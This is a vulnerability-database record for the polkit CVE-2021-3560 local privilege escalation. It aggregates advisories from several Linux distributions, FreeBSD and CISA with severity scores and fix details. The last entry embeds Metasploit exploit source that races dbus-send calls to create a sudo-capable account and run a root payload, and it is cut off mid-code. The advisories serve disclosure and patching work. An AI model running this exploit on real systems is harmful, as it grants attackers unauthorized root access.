"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "PHSA-2021-0037", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-37", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-03T08:54:49", "description": "An update of {'polkit'} packages of Photon OS has been released.\n", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "photon", "title": "Home\nDownload Photon OS\nUser Documentation\nFAQ\nSecurity Advisories\nRelated Information\n\nLightwave - PHSA-2021-2.0-0350", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "PHSA-2021-2.0-0350", "href": "https://github.com/vmware/photon/wiki/Security-Updates-2-350", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-11-03T08:46:42", "description": "An update of {'polkit'} packages of Photon OS has been released.\n", "cvss3": {}, "published": "2021-06-03T00:00:00", "type": "photon", "title": "Home\nDownload Photon OS\nUser Documentation\nFAQ\nSecurity Advisories\nRelated Information\n\nLightwave - PHSA-2021-1.0-0397", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "PHSA-2021-1.0-0397", "href": "https://github.com/vmware/photon/wiki/Security-Updates-1.0-397", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-19T15:55:02", "description": "Updates of ['polkit'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0350", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "PHSA-2021-0350", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-350", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T18:42:51", "description": "Updates of ['polkit', 'go'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0248", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24553", "CVE-2020-29510", "CVE-2021-27918", "CVE-2021-3114", "CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "PHSA-2021-0248", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-248", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-29T08:15:46", "description": "Updates of ['go', 'polkit'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-3.0-0248", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24553", "CVE-2020-29510", "CVE-2021-27918", "CVE-2021-3114", "CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "PHSA-2021-3.0-0248", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-248", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2023-06-19T15:18:11", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.\n#### Mitigation\n\nRed Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update as soon as possible. \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:20:59", "type": "redhatcve", "title": "CVE-2021-3560", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-04-06T08:14:12", "id": "RH:CVE-2021-3560", "href": "https://access.redhat.com/security/cve/cve-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Red Hat Polkit contains an incorrect authorization vulnerability through the bypassing of credential checks for D-Bus requests, allowing for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-12T00:00:00", "type": "cisa_kev", "title": "Red Hat Polkit Incorrect Authorization Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-12T00:00:00", "id": "CISA-KEV-CVE-2021-3560", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2023-06-19T15:37:27", "description": "\n\nCedric Buissart reports:\n\nThe function polkit_system_bus_name_get_creds_sync is used to get the\n\t uid and pid of the process requesting the action. It does this by\n\t sending the unique bus name of the requesting process, which is\n\t typically something like \":1.96\", to dbus-daemon. These unique names\n\t are assigned and managed by dbus-daemon and cannot be forged, so this\n\t is a good way to check the privileges of the requesting process.\nThe vulnerability happens when the requesting process disconnects from\n\t dbus-daemon just before the call to\n\t polkit_system_bus_name_get_creds_sync starts. In this scenario, the\n\t unique bus name is no longer valid, so dbus-daemon sends back an error\n\t reply. This error case is handled in\n\t polkit_system_bus_name_get_creds_sync by setting the value of the\n\t error parameter, but it still returns TRUE, rather than FALSE.\n\t This behavior means that all callers of\n\t polkit_system_bus_name_get_creds_sync need to carefully check whether\n\t an error was set. If the calling function forgets to check for errors\n\t then it will think that the uid of the requesting process is 0 (because\n\t the AsyncGetBusNameCredsData struct is zero initialized). In other\n\t words, it will think that the action was requested by a root process,\n\t and will therefore allow it.\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "freebsd", "title": "polkit -- local privilege escalation using polkit_system_bus_name_get_creds_sync", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "36A35D83-C560-11EB-84AB-E0D55E2A8BF9", "href": "https://vuxml.freebsd.org/freebsd/36a35d83-c560-11eb-84ab-e0d55e2a8bf9.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2023-06-19T15:36:02", "description": "polkit is a toolkit for defining and handling authorizations. It is used for allowing unprivileged processes to speak to privileged processes. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-19T01:14:12", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: polkit-0.117-2.fc33.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-19T01:14:12", "id": "FEDORA:D126131F01F8", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FBORD44GPNJPRTR7EN52KG5UBJ754TAJ/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T15:36:02", "description": "polkit is a toolkit for defining and handling authorizations. It is used for allowing unprivileged processes to speak to privileged processes. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-07T01:16:40", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: polkit-0.117-3.fc34.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-07T01:16:40", "id": "FEDORA:6431E305A8AE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KAEOWGOHEJK76KE57HCCTP7AFD35SBUG/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-06-19T15:24:18", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T19:15:00", "type": "debiancve", "title": "CVE-2021-3560", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-02-16T19:15:00", "id": "DEBIANCVE:CVE-2021-3560", "href": "https://security-tracker.debian.org/tracker/CVE-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2023-06-19T15:05:25", "description": "New polkit packages are available for Slackware 14.2 and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/polkit-0.113-i586-3_slack14.2.txz: Rebuilt.\n This update includes a mitigation for local privilege escalation using\n polkit_system_bus_name_get_creds_sync().\n For more information, see:\n https://vulners.com/cve/CVE-2021-3560\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/polkit-0.113-i586-3_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/polkit-0.113-x86_64-3_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/polkit-0.119-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/polkit-0.119-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 package:\nd0a4fd417b76e84c8d9cd6ebe114e647 polkit-0.113-i586-3_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nd7772cbf234dc38e87298cbaa37ba80e polkit-0.113-x86_64-3_slack14.2.txz\n\nSlackware -current package:\n64fec13a890084fb063867ddca80cc3f l/polkit-0.119-i586-1.txz\n\nSlackware x86_64 -current package:\n69e81fef9df950635769876e703ed639 l/polkit-0.119-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg polkit-0.113-i586-3_slack14.2.txz", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-07T19:07:33", "type": "slackware", "title": "[slackware-security] polkit", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-07T19:07:33", "id": "SSA-2021-158-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.342839", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-06-23T11:06:03", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T19:15:00", "type": "alpinelinux", "title": "CVE-2021-3560", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-06-12T07:15:00", "id": "ALPINE:CVE-2021-3560", "href": "https://security.alpinelinux.org/vuln/CVE-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2023-06-19T16:34:56", "description": "A flaw was found in polkit. When a requesting process disconnects from dbus-daemon just before the call to polkit_system_bus_name_get_creds_sync starts, the process cannot get a unique uid and pid of the process and it cannot verify the privileges of the requesting process (CVE-2021-3560). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T21:45:12", "type": "mageia", "title": "Updated polkit packages fix a security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-08T21:45:12", "id": "MGASA-2021-0244", "href": "https://advisories.mageia.org/MGASA-2021-0244.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-06-19T15:15:32", "description": "A vulnerability exists within the polkit system service that can be leveraged by a local, unprivileged attacker to perform privileged operations. In order to leverage the vulnerability, the attacker invokes a method over D-Bus and kills the client process. This will occasionally cause the operation to complete without being subjected to all of the necessary authentication. The exploit module leverages this to add a new user with a sudo access and a known password. The new account is then leveraged to execute a payload with root privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-10T00:00:00", "type": "zdt", "title": "Polkit D-Bus Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-10T00:00:00", "id": "1337DAY-ID-36544", "href": "https://0day.today/exploit/description/36544", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'unix_crypt'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Local::Linux\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Polkit D-Bus Authentication Bypass',\n 'Description' => %q{\n A vulnerability exists within the polkit system service that can be leveraged by a local, unprivileged\n attacker to perform privileged operations. In order to leverage the vulnerability, the attacker invokes a\n method over D-Bus and kills the client process. This will occasionally cause the operation to complete without\n being subjected to all of the necessary authentication.\n The exploit module leverages this to add a new user with a sudo access and a known password. The new account\n is then leveraged to execute a payload with root privileges.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Kevin Backhouse', # vulnerability discovery and analysis\n 'Spencer McIntyre', # metasploit module\n 'jheysel-r7' # metasploit module\n ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Platform' => ['unix', 'linux'],\n 'References' => [\n ['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],\n ['CVE', '2021-3560'],\n ['EDB', '50011']\n ],\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-06-03',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, SCREEN_EFFECTS],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n register_options([\n OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\\$)$/),\n OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),\n OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 30]),\n OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])\n ])\n register_advanced_options([\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ])\n end\n\n def get_loop_sequence\n datastore['ITERATIONS'].times.map(&:to_s).join(' ')\n end\n\n def exploit_set_realname(new_realname)\n loop_sequence = get_loop_sequence\n cmd_exec(<<~SCRIPT\n for i in #{loop_sequence}; do\n dbus-send\n --system\n --dest=org.freedesktop.Accounts\n --type=method_call\n --print-reply\n /org/freedesktop/Accounts/User0\n org.freedesktop.Accounts.User.SetRealName\n string:'#{new_realname}' &\n sleep #{@cmd_delay};\n kill $!;\n dbus-send\n --system\n --dest=org.freedesktop.Accounts\n --print-reply\n /org/freedesktop/Accounts/User0\n org.freedesktop.DBus.Properties.Get\n string:org.freedesktop.Accounts.User\n string:RealName\n | grep \"string \\\\\"#{new_realname}\\\\\"\";\n if [ $? -eq 0 ]; then\n echo success;\n break;\n fi;\n done\n SCRIPT\n .gsub(/\\s+/, ' ')) =~ /success/\n end\n\n def executable?(path)\n cmd_exec(\"test -x '#{path}' && echo true\").include? 'true'\n end\n\n def get_cmd_delay\n user = rand_text_alphanumeric(8)\n time_command = \"bash -c 'time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{user} string:\\\"#{user}\\\" int32:1'\"\n time = cmd_exec(time_command, nil, datastore['TIMEOUT']).match(/real\\s+\\d+m(\\d+.\\d+)s/)\n unless time && time[1]\n print_error(\"Unable to determine the time taken to run the dbus command, so the exploit cannot continue. Try increasing the TIMEOUT option. The command that failed was: #{time_command}\")\n return nil\n end\n\n time_in_seconds = time[1].to_f\n # The dbus-send command timeout is implementation-defined, typically 25 seconds\n # https://dbus.freedesktop.org/doc/dbus-send.1.html#:~:text=25%20seconds\n if time_in_seconds > datastore['TIMEOUT'].to_f || time_in_seconds > 25.00\n print_error('The dbus-send command timed out which means the exploit cannot continue. This is likely due to the session service type being X11 instead of SSH. Please see the module documentation for more information.')\n return nil\n end\n time_in_seconds / 2\n end\n\n def check\n if datastore['TIMEOUT'] < 26\n return CheckCode::Unknown(\"TIMEOUT is set to less than 26 seconds, so we can't detect if polkit times out or not.\")\n end\n\n unless cmd_exec('pkexec --version') =~ /pkexec version 